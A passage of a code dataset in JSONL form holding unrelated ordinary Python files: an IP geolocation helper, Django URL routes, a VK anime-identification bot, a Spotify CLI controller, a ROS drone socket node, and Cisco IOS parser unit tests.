location=re.findall(\".*zi\\\">(.*?)<\",str(temp))[0]\n print(\"Location:\",location)\n return location\n except:\n print(\"Location IP Fail\")\n\n \nif __name__ == '__main__':\n IP = '144.34.158.30'\n #LocateIP(IP)\n QueryIPJson(IP)\n", "sub_path": "LocateIP.py", "file_name": "LocateIP.py", "file_ext": "py", 
"file_size_in_byte": 1252, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "323801207", "text": "from django.conf.urls import patterns, url\nfrom green import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^about', views.about, name='about'),\n\t url(r'^home', views.home, name='home'),\n url(r'^pdf', views.export_to_pdf, name='export_to_pdf'),\n\n\n\n )\n", "sub_path": "green/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 380, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "green.views.index", "line_number": 5, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "green.views.about", "line_number": 6, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "green.views.home", "line_number": 7, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "green.views.export_to_pdf", "line_number": 8, "usage_type": "attribute"}, {"api_name": "green.views", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "176181184", "text": "import vk\nimport requests\nimport urllib\nimport base64 \nimport json\nimport config\nimport time\nimport datetime\nimport os.path\n\ndef convert_to_base64(img_file_name):\n\treturn req_encode(base64.encodestring(open(img_file_name,\"rb\").read()))\n\ndef req_encode(str_file):\n\treturn str_file\n\ndef whatAnimeRequest(img):\n\theaders = {\n\t'X-Requested-With': 'XMLHttpRequest',\n\t'Refer': 'https://whatanime.ga/',\n\t'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'\n\t}\n\tr = requests.post('https://whatanime.ga/search', data={'data': convert_to_base64(img)}, headers=headers)\n\tif (r.status_code != 200):\n\t\treturn 0\n\tif (len(r.json()['docs']) < 1):\n\t\treturn 1\n\treturn r.json()['docs'][0]\n\ndef getAnimeInfoMsg(animeInfo):\n\tsimilarity = 100 - animeInfo['diff']\n\tif (animeInfo == 0):\n\t\treturn \"Server error. 
Try again later.\"\n\tif (animeInfo == 1 or similarity <= 88):\n\t\treturn \"I don't know this anime, b-baka!\"\n\tmessage = animeInfo['title'] + '\\n\\r' + animeInfo['anime'] + '\\n\\r' + animeInfo['title_english'] + '\\n\\r'\n\tmessage = message + 'EP#' + str(animeInfo['episode']).zfill(2) + ' ' + str(datetime.timedelta(seconds=animeInfo['from'])).split('.')[0] + '\\n\\r'\n\tmessage = message + ('%.2f' % similarity) + '% similarity\\n\\r'\n\treturn message\n\ndef getItemFromFwdMessage(fwd):\n\tif ('fwd_messages' not in fwd):\n\t\treturn fwd\n\treturn getItemFromFwdMessage(fwd['fwd_messages'][0])\n\nlast_message_id = 0\nif os.path.isfile('last'):\n\tfile = open(\"last\", \"r\")\n\tlast_message_id = int(file.read())\n\tfile.close()\n\nconfig = json.load(open('config.json')) \nsession = vk.Session()\napi = vk.API(session, v='5.62', lang='ru', timeout=10)\n\nwhile 1:\n\ttime.sleep(9)\n\tif (last_message_id):\n\t\tr = api.messages.get(access_token=config['vk_access_token'], count=20, last_message_id=last_message_id)\n\telse:\n\t\tr = api.messages.get(access_token=config['vk_access_token'], count=20)\n\tif (len(r['items']) < 1):\n\t\tcontinue\n\tlast_message_id = r['items'][0]['id']\n\tfor item in r['items']:\n\t\tmessage = getItemFromFwdMessage(item)\n\t\tif (item['body'][:13] != \"[id391181538|\" or 'attachments' not in message or 'chat_id' not in item):\n\t\t\tcontinue\n\t\tfor photoAttach in message['attachments']:\n\t\t\tif photoAttach['type'] == 'photo':\n\t\t\t\tpic = photoAttach['photo']\n\t\t\t\tbreak\n\t\t# if not pic:\n\t\t# \tcontinue\n\t\tphs = []\n\t\tfor (ph, url) in pic.items():\n\t\t\tif 'photo' in ph:\n\t\t\t\tphs.append(ph)\n\t\turl = pic[min(phs)]\n\t\timage_file = \"./pic/\"+str(int(time.time()))+'.'+url.split('.')[-1]\n\t\turllib.request.urlretrieve(url, image_file)\n\t\tanimeInfo = whatAnimeRequest(image_file)\n\t\tmsg = getAnimeInfoMsg(animeInfo)\n\t\ttime.sleep(1)\n\t\tres = api.messages.send(access_token=config['vk_access_token'], forward_messages=item['id'], chat_id=item['chat_id'], message=msg)\n\t\tprint(res)\n\tfile = open(\"last\", \"w\")\n\tfile.write(str(last_message_id))\n\tfile.close()\n\n", "sub_path": "whatAnimeVk.py", "file_name": "whatAnimeVk.py", "file_ext": "py", "file_size_in_byte": 2852, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "base64.encodestring", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 47, "usage_type": "name"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "vk.Session", "line_number": 53, "usage_type": "call"}, {"api_name": "vk.API", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 57, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 81, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 81, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "610747032", "text": "import time\nimport sys\nfrom time import sleep\nfrom subprocess import Popen, PIPE\n\nimport click\nimport 
requests\n\n\n@click.group()\ndef main():\n print(\n ' ################################################################')\n print(\n ' # #')\n print(\n ' # ____ __ #')\n print(\n ' # /\\ _`\\ /\\ \\__ __ #')\n print(\n ' # \\ \\,\\L\\_\\ _____ ___\\ \\ ,_\\/\\_\\ _____ __ __ #')\n print(\n ' # \\/_\\__ \\ /\\ \\'__`\\ / __`\\ \\ \\/\\/\\ \\/\\ \\'__`\\/\\ \\/\\ \\ #')\n print(\n ' # /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\ \\ \\ \\_\\ \\ \\ \\ \\L\\ \\ \\ \\_\\ \\ #')\n print(\n ' # \\ `\\____\\ \\ ,__/\\ \\____/\\ \\__\\\\ \\_\\ \\ ,__/\\/`____ \\ #')\n print(\n ' # \\/_____/\\ \\ \\/ \\/___/ \\/__/ \\/_/\\ \\ \\/ `/___/> \\ #')\n print(\n ' # \\ \\_\\ \\ \\_\\ /\\___/ #')\n print(\n ' # \\/_/ \\/_/ \\/__/ #')\n print(\n ' # #')\n print(\n ' # #')\n print(\n ' # by bjarneo #')\n print(\n ' # #')\n print(\n ' ################################################################\\n')\n\n\ndef osascript(command):\n '''Run apple script command.'''\n p = Popen(\n ['osascript', '-e', 'tell app \"Spotify\" to {}'.format(command)],\n stdout=PIPE, stderr=PIPE)\n # get stdout and stderr\n output, err = p.communicate()\n # strip text and decode to unicode\n output = output.strip().decode('utf-8')\n return output\n\n\n@main.command()\n@click.argument('query')\ndef search(query):\n '''Search for song then play it.'''\n # call track api to search for songs\n url = 'https://ws.spotify.com/search/1/track.json'\n # get results\n datas = requests.get(url, params={'q': query}).json()\n\n # define string format for each row\n space = '{:^4} | {:^25} | {:^40} | {:^25}'\n\n # print header\n print(space.format('#', 'Artist', 'Song', 'Album'))\n # print divider\n print(space.format('-' * 4, '-' * 25, '-' * 40, '-' * 25))\n\n # print each song\n for i, track in enumerate(datas['tracks']):\n print(space.format(\n i, track['artists'][0]['name'][:25], track['name'][:40],\n track['album']['name'][:25]))\n\n # sleep 0.01 second for sexy print\n time.sleep(0.01)\n\n # ask user which one he/she wants\n index = input('\\nWhich one do you want to listen? 
')\n\n # get result and convert it to integer\n try:\n index = int(index)\n except ValueError:\n print('Index should be integer.')\n sys.exit(1)\n\n # call apple script to play the specific song\n try:\n osascript('play track \"{}\"'.format(datas['tracks'][index]['href']))\n print('Playing now: {}'.format(datas['tracks'][index]['name']))\n except IndexError:\n # in case of user enters a invalid index\n print('Play for nothing')\n sys.exit(1)\n\n\n@main.command()\ndef next():\n '''Play next song.'''\n osascript('next track')\n print('Next track')\n\n\n@main.command()\ndef previous():\n '''Play previous song.'''\n osascript('previous track')\n print('Previous track')\n\n\n@main.command()\ndef playpause():\n '''Play or pause current song.'''\n osascript('playpause')\n print('Playpause track')\n\n\n@main.command()\ndef volume():\n '''The sound volume set in Spotify (0-100).'''\n output = osascript('get sound volume')\n print('Current volume:', output)\n\n\n@main.command()\n@click.argument('volume')\ndef set_volume(volume):\n '''Set spotify sound volume (0-100).'''\n osascript('set sound volume to {}'.format(volume))\n print('Current volume:', volume)\n\n\n@main.command()\ndef state():\n '''Stopped, playing, or paused.'''\n output = osascript('get player state')\n print('Player state:', output)\n\n\n@main.command()\ndef position():\n '''The curret position (in seconds) of the current song playing.'''\n output = osascript('get player position')\n print('Player position:', output)\n\n\n@main.command()\n@click.argument('position')\ndef set_position(position):\n '''Set track position (in seconds) of the current song.'''\n osascript('set player position to {}'.format(position))\n print('Player position:', position)\n\n\n@main.command()\ndef repeat():\n '''Is repeating enabled or disabled (boolean value)'''\n output = osascript('get repeating')\n print('Repeat:', output)\n\n\n@main.command()\ndef toggle_repeat():\n '''Toggle repeat option.'''\n # get current repeat status\n output = osascript('get repeating')\n\n if 'true' == output:\n # if true then set repeating to false\n osascript('set repeating to false')\n print('Repeat: false')\n else:\n # if true then set repeating to true\n osascript('set repeating to true')\n print('Repeat: true')\n\n\n@main.command()\n@click.argument('repeat')\ndef set_repeat(repeat):\n '''Set repeat option.'''\n osascript('set repeating to {}'.format(repeat))\n print('Repeat:', repeat)\n\n\n@main.command()\ndef shuffle():\n '''Is shuffling enabled or disabled (boolean value).'''\n output = osascript('get shuffling')\n print('Shuffle:', output)\n\n\n@main.command()\ndef toggle_shuffle():\n '''Toggle shuffle option.'''\n # get current shuffle status\n output = osascript('get shuffling')\n\n if 'true' == output:\n # if true then set shuffle to false\n osascript('set shuffling to false')\n print('Shuffle: false')\n else:\n # if true then set shuffle to true\n osascript('set shuffling to true')\n print('Shuffle: true')\n\n\n@main.command()\n@click.argument('shuffle')\ndef set_shuffle(shuffle):\n '''Set shuffle option.'''\n osascript('set shuffling to {}'.format(shuffle))\n print('Shuffle:', shuffle)\n\n\n@main.command()\ndef track():\n '''Print current track info.'''\n infos = [\n ('Artist', osascript('get artist of current track')),\n ('Album', osascript('get album of current track')),\n ('Disc number', osascript('get disc number of current track')),\n ('Duration', osascript('get duration of current track')),\n ('Played count', osascript('get played count of current 
    infos = [\n        ('Artist', osascript('get artist of current track')),\n        ('Album', osascript('get album of current track')),\n        ('Disc number', osascript('get disc number of current track')),\n        ('Duration', osascript('get duration of current track')),\n        ('Played count', osascript('get played count of current track')),\n        ('Track number', osascript('get track number of current track')),\n        ('Starred', osascript('get starred of current track')),\n        ('Popularity', osascript('get popularity of current track')),\n        ('Track Id', osascript('get id of current track')),\n        ('Name', osascript('get name of current track')),\n        # ('artwork', osascript('get artwork of current track')),\n        ('Album artist', osascript('get album artist of current track')),\n        ('Url', osascript('get spotify url of current track')),\n    ]\n\n    # define row string format\n    row = '{:12}: {}'\n    for k, v in infos:\n        print(row.format(k, v))\n\n\n@main.command()\ndef current():\n    '''Continuously poll the current track and report when a new track starts.'''\n    # save old track url\n    old_url = ''\n\n    # check current_url is the same as old_url\n    while True:\n        # get current track url\n        current_url = osascript('get spotify url of current track')\n\n        # if current_url is not the same as old_url,\n        # fetch the track info and print it\n        if current_url != old_url:\n            # call track api to retrieve track info\n            url = 'https://api.spotify.com/v1/tracks/{}'.format(\n                current_url.split(':')[-1])\n            res = requests.get(url)\n            datas = res.json()\n\n            print('Now playing: {}'.format(datas['name']))\n\n            # update old_url with current_url\n            old_url = current_url\n\n        # sleep for 0.1 second\n        time.sleep(0.1)\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "cool.py", "file_name": "cool.py", "file_ext": "py", "file_size_in_byte": 8071, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "click.group", "line_number": 10, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 50, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 65, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 101, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 59, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 133, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 155, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 186, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 217, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 266, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "413932347", "text": "#!/usr/bin/env python\nimport rospy\nimport sys\nimport json\nfrom guide_flight import guide\nfrom socketIO_client import SocketIO, BaseNamespace\nfrom std_msgs.msg import Empty\n\nclass socket:\n\n    def __init__(self):\n        self.pub_takeoff = rospy.Publisher('/bebop/takeoff', Empty, queue_size=10)\n        self.pub_land = rospy.Publisher('/bebop/land', Empty, queue_size=10)\n        self.pub_emgland = rospy.Publisher('/bebop/reset', Empty, queue_size=10)\n        self.startSocket()\n\n    def startSocket(self):\n        self.sio = SocketIO('fyp.joelwalker.co.uk', 3000, BaseNamespace)\n        self.sio.on('connected', self.on_connected)\n        self.sio.on('updateDronePos', self.on_updatePos)\n        self.sio.on('takeoff', self.on_takeoff)\n        self.sio.on('landing', self.on_landing)\n        self.sio.on('emgLanding', self.on_emgLanding)\n        self.sio.emit('connected')\n        self.sio.wait()\n\n    def on_connected(self, *args):\n        print(\"Socket Connected\")\n\n    def on_updatePos(self, *args):\n
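        # round-tripping args through json.dumps/json.loads converts the socketIO payload into plain Python objects; element 0 is the position dict\n        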
dataj = json.loads(json.dumps(args))[0]\n\n latitude = dataj['latitude']\n longitude = dataj['longitude']\n print(\"New Node\")\n print(\"lat: \" + str(latitude))\n print(\"long: \" + str(longitude))\n\n node = guide(latitude, longitude)\n\n\n def on_takeoff(self, args):\n print(\"takeoff\")\n self.pub_takeoff.publish(Empty())\n\n def on_landing(self, args):\n print(\"land\")\n self.pub_land.publish(Empty())\n\n def on_emgLanding(self, args):\n print(\"EMG LANDING\")\n self.pub_emgland.publish(Empty())\n\n\n\n\n\n\ndef main(args):\n try:\n rospy.init_node('bebop_socket')\n rospy.spin()\n except KeyboardInterrupt:\n\n rospy.signal_shutdown('Bye')\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n", "sub_path": "src/bebop_fyp/scripts/socket_drone.py", "file_name": "socket_drone.py", "file_ext": "py", "file_size_in_byte": 1791, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rospy.Publisher", "line_number": 12, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 12, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 13, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 13, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 14, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 14, "usage_type": "argument"}, {"api_name": "socketIO_client.SocketIO", "line_number": 18, "usage_type": "call"}, {"api_name": "socketIO_client.BaseNamespace", "line_number": 18, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "guide_flight.guide", "line_number": 39, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 44, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 48, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 52, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 61, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 62, "usage_type": "call"}, {"api_name": "rospy.signal_shutdown", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}]} +{"seq_id": "640646296", "text": "import unittest\nimport genie.gre\nfrom unittest.mock import Mock\nfrom pyats.topology import Device\n\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError, \\\n SchemaMissingKeyError\n\n# c7600 show_platform\nfrom genie.libs.parser.ios.c7600.show_platform import (ShowVersion, \n Dir,\n ShowRedundancy,\n ShowInventory,\n ShowModule)\n\nclass TestShowVersion(unittest.TestCase):\n device_empty = Device(name='empty')\n device_c7600 = Device(name='c7600')\n\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n Technical Support: http://www.cisco.com/techsupport\n Copyright (c) 1986-2013 by Cisco Systems, Inc.\n Compiled Wed 26-Jun-13 02:21 by alnguyen\n\n ROM: System Bootstrap, Version 12.2(17r)SX7, RELEASE SOFTWARE (fc1)\n BOOTLDR: Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n\n ipcore-ssr-uut2 uptime is 22 
weeks, 6 days, 2 hours, 1 minute\n Uptime for this control processor is 22 weeks, 6 days, 1 hour, 57 minutes\n System returned to ROM by power cycle at 03:04:03 PDT Thu May 18 2017 (SP by power on)\n System image file is \"disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2\"\n Last reload type: Normal Reload\n Last reload reason: abort at PC 0x433A11BC\n\n\n\n This product contains cryptographic features and is subject to United\n States and local country laws governing import, export, transfer and\n use. Delivery of Cisco cryptographic products does not imply\n third-party authority to import, export, distribute or use encryption.\n Importers, exporters, distributors and users are responsible for\n compliance with U.S. and local country laws. By using this product you\n agree to comply with applicable laws and regulations. If you are unable\n to comply with U.S. and local laws, return this product immediately.\n\n A summary of U.S. laws governing Cisco cryptographic products may be found at:\n http://www.cisco.com/wwl/export/crypto/tool/stqrg.html\n\n If you require further assistance please contact us by sending email to\n export@cisco.com.\n\n cisco CISCO7606 (R7000) processor (revision 1.0) with 983008K/65536K bytes of memory.\n Processor board ID FOX11140RN8\n SR71000 CPU at 600MHz, Implementation 1284, Rev 1.2, 512KB L2 Cache\n Last reset from s/w reset\n 1 Enhanced FlexWAN controller (4 Serial).\n 1 Virtual Ethernet interface\n 52 Gigabit Ethernet interfaces\n 4 Serial interfaces\n 1917K bytes of non-volatile configuration memory.\n 8192K bytes of packet buffer memory.\n\n 65536K bytes of Flash internal SIMM (Sector size 512K).\n Configuration register is 0x2\n\n '''}\n\n parsed_output_c7600 = {\n 'version': {\n 'bootldr_version': 'Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301',\n 'chassis': 'CISCO7606',\n 'compiled_by': 'alnguyen',\n 'compiled_date': 'Wed 26-Jun-13 02:21',\n 'control_processor_uptime': '22 weeks, 6 days, 1 hour, 57 minutes',\n 'controller': {\n 'counts': 1,\n 'serial': 4,\n 'type': 'Enhanced FlexWAN',\n },\n 'cpu': {\n 'implementation': '1284',\n 'l2_cache': '512KB',\n 'name': 'SR71000',\n 'rev': '1.2',\n 'speed': '600MHz',\n },\n 'curr_config_register': '0x2',\n 'hostname': 'ipcore-ssr-uut2',\n 'image_id': 's72033_rp-ADVENTERPRISEK9_DBG-M',\n 'interfaces': {\n 'gigabit_ethernet': 52,\n 'serial': 4,\n 'virtual_ethernet': 1,\n },\n 'last_reload': {\n 'reason': 'abort at PC 0x433A11BC',\n 'type': 'Normal Reload',\n },\n 'last_reset': 's/w',\n 'main_mem': '983008',\n 'memory': {\n 'flash_internal_SIMM': 65536,\n 'non_volatile_conf': 1917,\n 'packet_buffer': 8192,\n },\n 'os': 'IOS',\n 'platform': 's72033_rp',\n 'processor_board_id': 'FOX11140RN8',\n 'processor_type': 'R7000',\n 'returned_to_rom_by': 'power cycle at 03:04:03 PDT Thu May 18 2017 (SP by power on)',\n 'rom': 'System Bootstrap, Version 12.2(17r)SX7, RELEASE SOFTWARE',\n 'rom_version': '(fc1)',\n 'system_image': 'disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2',\n 'uptime': '22 weeks, 6 days, 2 hours, 1 minute',\n 'version': '15.4(0.10)S',\n },\n }\n\n def test_empty(self):\n self.device_empty = Mock(**self.empty_output)\n obj = ShowVersion(device=self.device_empty)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = obj.parse()\n\n def test_c7600(self):\n self.maxDiff = None\n self.device_c7600 = Mock(**self.output_c7600)\n obj = 
ShowVersion(device=self.device_c7600)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output_c7600)\n\n\nclass TestDir(unittest.TestCase):\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Directory of disk0:/\n\n 2 -rw- 373 May 9 2013 10:00:08 -07:00 default_config\n 3 -rw- 421 May 9 2013 10:00:20 -07:00 golden_config\n 4 -rw- 188183700 May 9 2013 10:11:56 -07:00 ISSUCleanGolden\n 5 -rw- 210179540 Oct 18 2018 07:22:24 -07:00 s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2\n\n 1024589824 bytes total (626180096 bytes free)\n '''}\n parsed_output = {\n 'dir': {\n 'dir': 'disk0:/',\n 'disk0:/': {\n 'bytes_free': '626180096',\n 'bytes_total': '1024589824',\n 'files': {\n 'ISSUCleanGolden': {\n 'index': '4',\n 'last_modified_date': 'May 9 2013 10:11:56 -07:00',\n 'permissions': '-rw-',\n 'size': '188183700',\n },\n 'default_config': {\n 'index': '2',\n 'last_modified_date': 'May 9 2013 10:00:08 -07:00',\n 'permissions': '-rw-',\n 'size': '373',\n },\n 'golden_config': {\n 'index': '3',\n 'last_modified_date': 'May 9 2013 10:00:20 -07:00',\n 'permissions': '-rw-',\n 'size': '421',\n },\n 's72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2': {\n 'index': '5',\n 'last_modified_date': 'Oct 18 2018 07:22:24 -07:00',\n 'permissions': '-rw-',\n 'size': '210179540',\n },\n },\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = Dir(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n\n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = Dir(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nclass TestShowRedundancy(unittest.TestCase):\n\n dev1 = Device(name='empty')\n dev_iosv = Device(name='c7600')\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Redundant System Information :\n ------------------------------\n Available system uptime = 24 weeks, 6 days, 23 hours, 14 minutes\n Switchovers system experienced = 0\n Standby failures = 0\n Last switchover reason = none\n\n Hardware Mode = Duplex\n Configured Redundancy Mode = sso\n Operating Redundancy Mode = sso\n Maintenance Mode = Disabled\n Communications = Up\n\n Current Processor Information :\n -------------------------------\n Active Location = slot 6\n Current Software state = ACTIVE\n Uptime in current state = 24 weeks, 6 days, 23 hours, 13 minutes\n Image Version = Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n Technical Support: http://www.cisco.com/techsupport\n Copyright (c) 1986-2013 by Cisco Systems, Inc.\n Compiled Wed 26-Jun-13 02:21 by alnguyen\n BOOT = disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;\n CONFIG_FILE =\n BOOTLDR =\n Configuration register = 0x2\n\n Peer Processor Information :\n ----------------------------\n Standby Location = slot 5\n Current Software state = STANDBY HOT\n Uptime in current state = 4 weeks, 1 day, 22 hours, 47 minutes\n Image Version = Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301\n Technical Support: http://www.cisco.com/techsupport\n Copyright (c) 1986-2013 by Cisco Systems, Inc.\n Compiled Wed 
26-Jun-13 02:21 by alnguyen\n BOOT = disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;\n CONFIG_FILE =\n BOOTLDR =\n Configuration register = 0x2\n \n '''}\n\n parsed_output = {\n 'red_sys_info': {\n 'available_system_uptime': '24 weeks, 6 days, 23 hours, 14 minutes',\n 'communications': 'Up',\n 'conf_red_mode': 'sso',\n 'hw_mode': 'Duplex',\n 'last_switchover_reason': 'none',\n 'maint_mode': 'Disabled',\n 'oper_red_mode': 'sso',\n 'standby_failures': '0',\n 'switchovers_system_experienced': '0',\n },\n 'slot': {\n 'slot 5': {\n 'boot': 'disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;',\n 'compiled_by': 'alnguyen',\n 'compiled_date': 'Wed 26-Jun-13 02:21',\n 'config_register': '0x2',\n 'curr_sw_state': 'STANDBY HOT',\n 'image_ver': 'Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301',\n 'uptime_in_curr_state': '4 weeks, 1 day, 22 hours, 47 minutes',\n },\n 'slot 6': {\n 'boot': 'disk0:s72033-adventerprisek9_dbg-mz.154-0.10.S-ipcore-ssr-uut2,12;',\n 'compiled_by': 'alnguyen',\n 'compiled_date': 'Wed 26-Jun-13 02:21',\n 'config_register': '0x2',\n 'curr_sw_state': 'ACTIVE',\n 'image_ver': 'Cisco IOS Software, s72033_rp Software (s72033_rp-ADVENTERPRISEK9_DBG-M), Version 15.4(0.10)S, EARLY DEPLOYMENT ENGINEERING WEEKLY BUILD, synced to BLD_DARLING_122S_040709_1301',\n 'uptime_in_curr_state': '24 weeks, 6 days, 23 hours, 13 minutes',\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = ShowRedundancy(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n \n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = ShowRedundancy(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nclass TestShowInventory(unittest.TestCase):\n\n dev1 = Device(name='empty')\n dev_iosv = Device(name='c7600')\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n NAME: \"CISCO7606\", DESCR: \"Cisco Systems Cisco 7600 6-slot Chassis System\"\n PID: CISCO7606 , VID: , SN: FOX11140RN8\n\n NAME: \"CLK-7600 1\", DESCR: \"OSR-7600 Clock FRU 1\"\n PID: CLK-7600 , VID: , SN: NWG1112014W\n\n NAME: \"CLK-7600 2\", DESCR: \"OSR-7600 Clock FRU 2\"\n PID: CLK-7600 , VID: , SN: NWG1112014W\n\n NAME: \"module 1\", DESCR: \"WS-X6748-GE-TX CEF720 48 port 10/100/1000mb Ethernet Rev. 2.7\"\n PID: WS-X6748-GE-TX , VID: V02, SN: SAL1209HMW3\n\n NAME: \"switching engine sub-module of 1\", DESCR: \"WS-F6700-CFC Centralized Forwarding Card Rev. 4.0\"\n PID: WS-F6700-CFC , VID: V05, SN: SAL1207G5V1\n\n NAME: \"module 2\", DESCR: \"2 port adapter Enhanced FlexWAN Rev. 2.1\"\n PID: WS-X6582-2PA , VID: V06, SN: JAE0939LYNQ\n\n NAME: \"module 2/1\", DESCR: \"Serial Port Adapter\"\n PID: PA-4T+ , VID: , SN: 32861325\n\n NAME: \"module 5\", DESCR: \"WS-SUP720-3BXL 2 ports 